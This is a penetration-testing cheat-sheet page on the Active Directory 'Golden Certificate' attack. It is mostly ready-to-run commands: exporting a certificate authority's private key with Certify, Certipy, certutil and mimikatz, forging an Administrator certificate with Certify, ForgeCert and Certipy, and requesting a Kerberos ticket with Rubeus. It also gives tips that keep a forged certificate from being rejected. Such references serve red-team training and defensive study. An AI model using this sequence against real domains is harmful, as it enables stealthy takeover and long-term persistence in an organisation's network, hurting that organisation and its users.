ad-adcs-golden-certificate.md (4549B)
1 --- 2 title: "Active Directory - Golden Certificate" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/ad-adcs-golden-certificate.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adcs-golden-certificate.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Active Directory - Golden Certificate 12 13 A Golden Certificate is a maliciously crafted certificate that an attacker generates using the CA’s private key. 14 15 ## Obtain CA certificate 16 17 Export the CA certificate including the private key: 18 19 * [GhostPack/Certify](https://github.com/GhostPack/Certify) 20 21 ```ps1 22 Certify.exe manage-self --dump-certs 23 ``` 24 25 * [ly4k/Certipy](https://github.com/ly4k/Certipy) 26 27 ```ps1 28 certipy ca -u 'administrator@corp.local' -p 'Passw0rd!' -ns '10.10.10.10' -target 'CA.CORP.LOCAL' -config 'CA.CORP.LOCAL\CORP-CA' -backup 29 ``` 30 31 * [windows-gui/certsrv.msc](https://learn.microsoft.com/en-us/system-center/scom/obtain-certificate-windows-server-and-operations-manager) 32 * Open `certsrv.msc` 33 * Right click the CA -> `All Tasks` -> `Back up CA...` 34 * Follow the wizard but make sure to check `Private key and CA certificate` 35 36 * [windows-gui/certlm.msc](https://learn.microsoft.com/en-us/windows-server/identity/ad-cs/export-certificate-private-key) 37 * Open `certlm.msc` 38 * Go to `Personal` -> `Certificates` 39 * Right click the CA signing certificate -> `All Tasks` -> `Export` 40 * Follow the wizard but make sure to choose `Yes, export the private key` 41 42 * [windows-commands/certutil](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil) 43 44 ```ps1 45 certutil -backupKey -f -p SuperSecurePassw0rd! C:\Windows\Tasks\CaBackupFolder 46 ``` 47 48 * [gentilkiwi/mimikatz](https://github.com/gentilkiwi/mimikatz) 49 50 ```ps1 51 mimikatz.exe "crypto::capi" "crypto::cng" "crypto::certificates /export" 52 ``` 53 54 ## Forge Golden Certificates 55 56 Forge a certificate of a target principal: 57 58 * [GhostPack/Certify](https://github.com/GhostPack/Certify) 59 60 ```ps1 61 Certify.exe forge --ca-cert <pfx-path/base64-pfx> --upn Administrator --sid S-1-5-21-976219687-1556195986-4104514715-500 62 ``` 63 64 * [GhostPack/ForgeCert](https://github.com/GhostPack/ForgeCert) 65 66 ```ps1 67 ForgeCert.exe --CaCertPath "ca.pfx" --CaCertPassword "Password" --Subject "CN=User" --SubjectAltName "administrator@domain.local" --NewCertPath "administrator.pfx" --NewCertPassword "Password" 68 ``` 69 70 * [ly4k/Certipy](https://github.com/ly4k/Certipy) 71 72 ```ps1 73 certipy forge -ca-pfx 'CORP-CA.pfx' -upn 'administrator@corp.local' -sid 'S-1-5-21-...-500' -crl 'ldap:///' 74 75 certipy forge -template 'attacker.pfx' -ca-pfx 'CORP-CA.pfx' -upn 'administrator@corp.local' -sid 'S-1-5-21-...-500' 76 ``` 77 78 :warning: Useful parameters when generating a golden certificate. 79 80 * `-crl`: If the `-crl` option is omitted when forging, authentication might fail. While the KDC doesn't typically perform an active CRL lookup during initial TGT issuance for performance reasons, it does often check for the presence of a CDP extension in the certificate. Its absence can lead to a `KDC_ERROR_CLIENT_NOT_TRUSTED` error. 81 * `-template 'attacker.pfx'`: Certipy will copy extensions (like Key Usage, basic constraints, AIA, etc.) from attacker.pfx into the new forged certificate, while still setting the **subject**, **UPN**, and *SID* as specified. 82 * `-subject "CN=xyz-CA-1, DC=xyz, DC=htb"`: set the **Distinguished Name** for the certificate 83 84 ## Request a TGT 85 86 * [GhostPack/Rubeus](https://github.com/GhostPack/Rubeus) 87 88 ```ps1 89 Rubeus.exe asktgt /user:Administrator /domain:dumpster.fire /certificate:<pfx-path/base64-pfx> 90 ``` 91 92 * [ly4k/Certipy](https://github.com/ly4k/Certipy) 93 94 ```ps1 95 certipy auth -pfx 'administrator_forged.pfx' -dc-ip '10.10.10.10' 96 ``` 97 98 ## References 99 100 * [BloodHound - GoldenCert Edge - SpecterOps - April 20, 2025](https://bloodhound.specterops.io/resources/edges/golden-cert) 101 * [Certificate authority - The Hacker Recipes - July 16,2025](https://www.thehacker.recipes/ad/persistence/adcs/certificate-authority) 102 * [Domain Persistence Techniques - Valdemar Carøe - August 6, 2025](https://github.com/GhostPack/Certify/wiki/3-‐-Domain-Persistence-Techniques) 103 * [Post‐Exploitation - Oliver Lyak - May 15, 2025](https://github.com/ly4k/Certipy/wiki/07-‐-Post‐Exploitation) 104 * [Steal or Forge Authentication Certificates - MITRE ATT&CK - April 15, 2025](https://attack.mitre.org/techniques/T1649/)